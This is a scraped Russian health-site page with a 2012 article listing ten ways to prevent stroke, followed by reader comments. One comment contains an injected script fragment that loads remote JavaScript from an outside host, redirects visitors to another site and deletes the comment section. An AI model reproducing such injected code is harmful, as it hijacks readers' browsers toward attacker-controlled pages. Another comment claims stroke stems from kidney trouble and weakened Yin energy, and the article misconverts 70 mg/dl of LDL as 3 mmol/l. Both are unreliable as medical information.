Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  10 способов защиты от инс...  >>  10 способов защиты от инсульта
 
Обратная связь
 

10 способов защиты от инсульта

Размер шрифта
18 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Виктория Ткаченко
Здоровье инфо
  • google_analytics: false
  • Нравится

Инсульт – одно из самых серьезных заболеваний, наиболее часто приводящих к грозным последствиям и инвалидности. Однако существуют простые методы профилактики инсульта, и практически каждый человек в силах применять их.

инсульт

1.     Контролируйте артериальное давление. Повышенное артериальное давление - это фактор риска возникновения инсульта. Если у одного из ваших родителей была диагностирована так называемая прегипертензия (артериальное давление в диапазоне от 130/80 до 139/89) или гипертензия (повышение давления до цифр 140/90 мм и выше), то обязательно нужно начать лечение. Врач подберет оптимальные препараты, но также необходимо регулярно измерять давление. 

2.     Управляйте стрессами и депрессией. Эмоциональное состояние напрямую отражается на здоровье. Минимизировав стресс и депрессию, вы обеспечите хорошее состояние сердечно-сосудистой системы и предупредите инсульт.

Позаботьтесь о своих родителях, ведь зачастую они могут чувствовать себя ненужными и одинокими. Позвоните, встретьтесь, пообщайтесь с ними. И это сделает их счастливее. Также  помогают улучшить настроение: медитация и йога, релаксирующая музыка, прогулка на свежем воздухе.

Если эти меры не помогают справиться с депрессией, необходимо обратиться за помощью к специалисту.

3.     Снижение риска образования тромбов. Наиболее распространенный препарат, помогающий предупредить развитие тромбов– аспирин. Он назначается для профилактики инсульта и инфаркта людям старше 45 лет, у которых есть факторы риска развития этих заболеваний:

  • ожирение;
  • повышенное артериальное давление;
  • курение;
  • повышенный уровень холестерина в крови.

Дозу аспирина необходимо согласовать с лечащим врачом.

4.     Контролируйте другие медицинские параметры здоровья. Если вы или ваши родители страдаете сахарным диабетом, аритмией, какой-либо формой поражения сердечной перегородки или сосудистой патологией, помните, что это также повышает риск инсульта.

Эти состояния нужно контролировать и по мере необходимости проводить терапию. Убедитесь в том, что ваш лечащий врач знает о них.

5.     Пересмотрите медикаментозное лечение. Если вы или ваши родители принимаете препараты заместительной гормональной терапии, лекарства для диабетиков или средства, уменьшающие боль при артритах, расскажите об этом лечащему врачу. Пересмотр и при необходимости назначение альтернативных схем лечения позволит снизить риск инсульта. 

6.     Обратите внимание на ранние сигналы опасности. Согласно исследованиям, у одного из трех людей  непродолжительная ишемическая атака (мини-инсульт) привела к острому инсульту. Симптомы мини-инсульта:

  • внезапная потеря чувствительности или слабость мышц лица, руки или ноги с одной стороны;
  • внезапная путаница и непонятность речи, затрудненность говорить;
  • внезапное головокружение, нарушение координации движения и походки.

Если вы заметите хотя бы один из этих сигналов опасности, незамедлительно обратитесь к врачу.

7.     Следите за уровнем «плохого» холестерина. Один из наиболее важных факторов риска инсульта – высокий уровень общего (выше 200 мг/дл, или 5,2 ммоль/л) и в особенности «плохого» холестерина – липопротеина низкой плотности, – показатель которого в крови не должен превышать концентрацию 70 мг/дл, или 3 ммоль/л.

Для снижения уровня «плохого» холестерина нужно соблюдать диету с уменьшенным количеством жиров и консультироваться у врача.

8.     Диета, полезная для сердца. Это должны быть продукты, богатые злаками, овощами, фруктами, рыбой, домашней птицей, нежирным мясом, а также обезжиренные молочные продукты или с пониженным содержанием жира. Жиры в суточном рационе должны составлять максимум 25-35 % от всего количества калорий. Не стоит злоупотреблять алкогольными напитками.

9.     Соблюдайте оптимальный уровень физической активности. Ежедневные упражнения – неотъемлемая часть здоровья сердечно-сосудистой системы.

Какой уровень нагрузки вам необходим? По мнению врачей, как минимум 30 минут интенсивных физических упражнений хотя бы 5 раз в неделю, а для людей старшего возраста – через день. По поводу того, какая именно физическая нагрузка подойдет вам, проконсультируйтесь с врачом.

10.   Бросьте курить. Курение повышает риск инсульта на 30%. Нелегко сразу бросить курить, однако все зависит от вас, и если вы сможете убедить себя и со временем откажетесь от этой привычки, это непременно продлит вашу жизнь.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

Здравствуйте, всё, что написано в этой статье о мерах предосторожности в отношении возможности возникновения инсульта - замечательно и правильно. Стоит обратить внимание, что причина инсульта заключается в нарушении работы почек. Необходимо обратиться к специалистам, которые помогут привести их в норму, чтобы избежать потенциально возможного инсульта.

АлександровАФ 18 июля 2012 в 19:37
в ослаблении их доминирующей энергии Инь
 Уважаемый Александр, сайт Здоровье-Инфо работает с материалами официальной, традиционной медицины. Вы это наверняка увидели сами. 
С сегодняшними возможностями интернета и сетей, Вы вполне можете создать свой ресурс с информацией, посвященной энергии Инь и Янь, и т.п.
Думаю, что собеседников на своих страницах Вы найдете предостаточно.
Всего доброго.   

АлександровАФ 18 июля 2012 в 20:37
и мне лучше сделать вид, что я не заходил на ваш сайт
 О чем Вы? Никто Вас не удаляет и не собирается. 

5 - Гость

13 марта 2014 в 17:10

Цитировать   |   Пожаловаться

интересны меры предотвращения инсульта у детей в младшем возрасте..... курение,ожирение и прочее вообще никак с ребенком не свяжется

6 - zzzzzz

30 июня 2015 в 23:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Болезни-близнецы. Мигрень и инсульт   Поделись улыбкою своей   У вашего близкого инсульт! 5 признаков   Надежда для пациентов с тяжелыми последствиями инсульта  
28 января 2013Надежда для пациентов с тяжелыми последствиями инсульта 07 сентября 2012Простая стелька научит людей заново ходить!
 
29 июля 2011Мускулы могут защитить от диабета 17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта
 

Слайдшоу

1
9 мифов о диабете
Просто усталость или болезнь
Как спасти родителей от инсульта

Тесты

Будет ли у вас инфаркт?
Оцените риск развития сахарного диабета
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.